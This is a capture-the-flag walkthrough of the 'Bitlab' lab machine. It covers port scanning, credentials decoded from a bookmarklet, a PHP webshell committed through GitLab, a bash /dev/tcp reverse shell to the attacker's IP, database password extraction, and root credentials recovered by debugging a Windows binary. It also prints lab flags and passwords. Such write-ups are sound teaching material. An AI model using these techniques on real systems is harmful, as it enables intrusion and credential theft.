Bitlab

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.114 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Tue Mar 14 18:58:46 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.114
Nmap scan report for 10.10.10.114
Host is up (0.36s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Mar 14 18:59:14 2023 -- 1 IP address (1 host up) scanned in 28.34 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,53,80,1490,32400,32469 10.10.10.114 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Tue Mar 14 18:59:33 2023 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.114
Nmap scan report for 10.10.10.114
Host is up (0.041s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a23bb0dd2891bfe8f9308231232f9218 (RSA)
|   256 e63bfbb37f9a35a8bdd0277b25d4eddc (ECDSA)
|_  256 c9543d91017803ab16146bccf0b73a55 (ED25519)
80/tcp open  http    nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 14 18:59:45 2023 -- 1 IP address (1 host up) scanned in 12.04 seconds

There is a GitLab Community Edition server on port 80. But there is no registration form, just the sign in form.

Exploitation

If we click on Help, we'll see that directory listing in enabled and there is a file called bookmarks.html.

This file contains bookmarks for sites which are out of the scope.

Except for the last bookmark called GitLab Login which contains some JavaScript code encoded in hexadecimal.

We can decode it by simple doing an echo of the string.

echo 'javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document_0x4b18[2][_0x4b18[0]]= _0x4b18[3];document_0x4b18[2][_0x4b18[0]]= _0x4b18[5]; })()'

javascript:(function(){ var _0x4b18=["value","user_login","getElementById","clave","user_password","11des0081x"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()

We get credentials for the clave user. Let's use them.

There is one snippet called Postgresql.

Which contains credentials for a PostgreSQL database.

Also, there is a project called Profile.

Which is accessible in http://10.10.10.114/profile.

We could try to create a new PHP webshell in the Profile project, and see if it is accessible.

Call it pwn.php, add the webshell, and click on Commit changes.

Then, complete the merge request, and click on Submit merge request.

Finally, merge the patch-1 branch into the master branch.

Now, the pwn.php file is located in the master branch of the Profile project, and we can run commands on the system.

curl 'http://10.10.10.114/profile/pwn.php?cmd=whoami'

www-data
<prewww-data</pre>

Time to get a shell. Set a netcat listener on port 4444, that will catch the reverse shell.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, send a reverse shell to our machine on port 4444, and get a shell as www-data.

curl 'http://10.10.10.114/profile/pwn.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.8/4444%200%3E%261%22'

Listening on 0.0.0.0 4444
Connection received on 10.10.10.114 34096
bash: cannot set terminal process group (1296): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bitlab:/var/www/html/profile$ whoami
whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

The user.txt flag is in the home directory of the clave user, we we'll have to become clave.

find / -name user.txt 2>/dev/null

/home/clave/user.txt

As we can se, port 5432 of the localhost is open, which is where the PostgreSQL database is running on.

netstat -tulpn

• -t TCP connections.

• -u UDP connections.

• -l listening.

• -p show the PID/Program name.

• -n don't resolve names.

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3022          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:3000         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp    18432      0 127.0.0.53:53           0.0.0.0:*                           - 

Unfortunately, the psql tool is not available on the system.

psql

bash: psql: command not found

There is an alternative way to enumerate databases. Using PHP PDO we could try to enumerate the PostgreSQL database. The idea is to open PHP in interactive mode, create a new connection to the database with the credentials we found earlier, then query everything from the profiles table, and fetch the results.

php --interactive

Interactive mode enabled                                                                                                             
                                                                                                                                     
php > $connection = new PDO('pgsql:dbname=profiles;host=localhost', 'profiles', 'profiles');                                         
php > $connect = $connection->query("select * from profiles");                                                                       
php > $results = $connect->fetchAll();                                                                                               
php > print_r($results);                                                                                                             
Array                                                                                                                                
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)

This looks like a base64 string, but trying to decode it gives an error.

echo "c3NoLXN0cjBuZy1wQHNz==" | base64 -d

ssh-str0ng-p@ssbase64: invalid input

If we remove the == characters, we'll get the ssh-str0ng-p@ss password.

echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d

ssh-str0ng-p@ss

But this password is not valid for the clave user.

sshpass -p 'ssh-str0ng-p@ss' ssh clave@10.10.10.114

Permission denied, please try again.

But, using the base64 string as the password seems to be valid. The, we'll be able to grab the user flag.

sshpass -p 'c3NoLXN0cjBuZy1wQHNz==' ssh clave@10.10.10.114

Last login: Thu Aug  8 14:40:09 2019
clave@bitlab:~$ whoami
clave
clave@bitlab:~$ cat user.txt 
3d5a9d4dbc5f4087d736838dbb607f8c

In his home directory there is one file called RemoteConnection.exe.

ls -l

total 20
-r-------- 1 clave clave 13824 Jul 30  2019 RemoteConnection.exe
-r-------- 1 clave clave    33 Mar 16 18:15 user.txt

As it is a Windows executable, let's transfer the file to our local machine.

scp clave@10.10.10.114:/home/clave/RemoteConnection.exe .

And then, transfer it to a Windows 7 32bits machine.

impacket-smbserver smbFolder $(pwd) -smb2support

On the Windows machine, copy it to the desktop.

copy \192.168.8.137\smbFolder\RemoteConnection.exe

If you try to run the binary, you'll get two errors saying that MSVCR100.dll and MSVCP100.dll are missing. Download the DLL files, and place them in C:\Windows\System32.

If we run the binary from the CMD console, we'll get the following message.

RemoteConnection.exe

Access Denied !!

Let's analyze the binary with Immunity Debugger. Click on File > Open, and select the binary.

We can try to list all the text strings by doing Rigth click > Search for > All referenced text strings.

There is one string with an absolute path to the putty.exe binary.

Let's follow the string in the disassembler.

As we can see, that binary is trying to get some parameters.

Let's set a break point right before this part of the binary gets executed.

Then, hit play to start running the program. When it reaches the breakpoint, it will stop and we should see the parameters in the EBX register.

As we can see, it contains the credentials of the root user. Log into the machine as root, and then all we have to do is reap the harvest and take the root flag.

sshpass -p 'Qf7]8YSV.wDNF*[7d?j&eD4^' ssh root@10.10.10.114

Last login: Wed Sep  7 13:12:33 2022
root@bitlab:~# whoami 
root
root@bitlab:~# cat root.txt 
6b4a156b373c924ac58f8a8689665754